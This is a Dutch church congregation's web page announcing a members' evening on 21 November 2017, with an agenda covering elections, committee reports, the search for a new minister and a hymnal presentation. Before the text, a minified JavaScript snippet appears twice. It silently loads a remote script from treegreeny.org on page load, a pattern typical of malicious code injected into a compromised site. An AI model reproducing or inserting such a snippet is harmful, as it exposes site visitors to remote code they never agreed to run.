;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uitnodiging gemeenteavond Hervormd Akkerwoude c.a. 21 november - PKN Damwâld

Uitnodiging gemeenteavond Hervormd Akkerwoude c.a. 21 november

Gepubliceerd op: dinsdag 14 november 2017

De kerkenraad nodigt alle gemeenteleden uit voor een gemeenteavond op dinsdag 21 november 2017 in ’t Skûlplak aan de Bûterblom 8 in Damwâld. Aanvang is 19.30 uur.
Een aantal zaken zullen deze avond aan de orde komen. Allereerst de verkiezing van ambtsdragers. Ook zullen de voorzitters van de verschillende colleges terugblikken op het afgelopen jaar en vertellen wat de plannen zijn voor de komende periode. Uiteraard bespreken we de stand van zaken rond het beroepingswerk. Ook zal organist Tim van der Weide een presentatie verzorgen over het Nieuwe Liedboek. Een uitstekende gelegenheid dus om met elkaar in gesprek te gaan over het reilen en zeilen in onze gemeente. Iedereen is dan ook van harte uitgenodigd!

Agenda
1. Opening
2. Verslag gemeenteavond 21 november 2016
3. Presentatie colleges
4. Stand van zaken beroepingswerk
5. Verkiezingen
6. Rondvraag
7. Pauze
8. Presentatie Tim van der Weide
9. Sluiting